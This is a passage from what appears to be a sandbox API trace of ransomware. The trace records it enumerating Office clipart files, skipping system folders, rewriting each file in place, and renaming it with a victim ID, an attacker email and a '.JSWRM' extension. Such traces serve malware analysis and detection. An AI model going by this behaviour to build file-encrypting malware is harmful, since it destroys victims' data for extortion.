office\\root\\clipart\\pub60cor\\tn00687_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00687_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00687_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0098.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN01164_.WMF", cAlternateFileName="")) returned 1 [0098.701] lstrcmpiW (lpString1="TN01164_.WMF", lpString2=".") returned 1 [0098.701] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="..") returned 1 [0098.701] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="...") returned 1 [0098.701] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="windows") returned -1 [0098.701] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="recovery") returned 1 [0098.702] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="perflogs") returned 1 [0098.702] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="documents and settings") returned 1 [0098.702] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.702] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="system volume information") returned 1 [0098.702] lstrcmpiW (lpString1="TN01164_.WMF", lpString2="msocache") returned 1 [0098.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01164_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01164_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01164_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01164_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01164_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01164_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0098.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01164_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=566) returned 1 [0098.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x230) returned 0x1ee6d0 [0098.703] ReadFile (in: hFile=0x314, lpBuffer=0x1ee6d0, nNumberOfBytesToRead=0x230, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesRead=0x345e89c*=0x230, lpOverlapped=0x0) returned 1 [0098.704] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.704] WriteFile (in: hFile=0x314, lpBuffer=0x1ee6d0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ee6d0*, lpNumberOfBytesWritten=0x345e898*=0x230, lpOverlapped=0x0) returned 1 [0098.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee6d0 | out: hHeap=0x1e0000) returned 1 [0098.704] CloseHandle (hObject=0x314) returned 1 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0098.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0098.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0098.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0098.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0098.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.704] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01164_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01164_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01164_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0098.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0098.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.706] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN01165_.WMF", cAlternateFileName="")) returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2=".") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="..") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="...") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="windows") returned -1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="recovery") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="perflogs") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="documents and settings") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="system volume information") returned 1 [0098.706] lstrcmpiW (lpString1="TN01165_.WMF", lpString2="msocache") returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01165_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01165_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01165_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0098.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01165_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01165_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01165_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0098.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0098.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0098.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01165_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01165_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.708] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1642) returned 1 [0098.708] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x660) returned 0x22d530 [0098.708] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e89c*=0x660, lpOverlapped=0x0) returned 1 [0098.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.709] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e898*=0x660, lpOverlapped=0x0) returned 1 [0098.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d530 | out: hHeap=0x1e0000) returned 1 [0098.710] CloseHandle (hObject=0x314) returned 1 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0098.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0098.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0098.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0098.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01165_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01165_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01165_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01165_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0098.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0098.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e02, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN01308_.WMF", cAlternateFileName="")) returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2=".") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="..") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="...") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="windows") returned -1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="recovery") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="perflogs") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="documents and settings") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="system volume information") returned 1 [0098.711] lstrcmpiW (lpString1="TN01308_.WMF", lpString2="msocache") returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01308_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01308_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01308_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01308_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN01308_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN01308_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0098.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0098.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01308_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.712] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19970) returned 1 [0098.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e00) returned 0x24d210 [0098.712] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4e00, lpOverlapped=0x0) returned 1 [0098.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.755] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4e00, lpOverlapped=0x0) returned 1 [0098.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0098.755] CloseHandle (hObject=0x314) returned 1 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0098.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0098.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0098.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0098.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01308_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN01308_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn01308_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0098.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0098.757] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00006_.WMF", cAlternateFileName="")) returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2=".") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="..") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="...") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="windows") returned -1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="recovery") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="perflogs") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="documents and settings") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="system volume information") returned 1 [0098.757] lstrcmpiW (lpString1="TR00006_.WMF", lpString2="msocache") returned 1 [0098.757] RtlAllocateHeap (HeapHandle=0x1e0000, 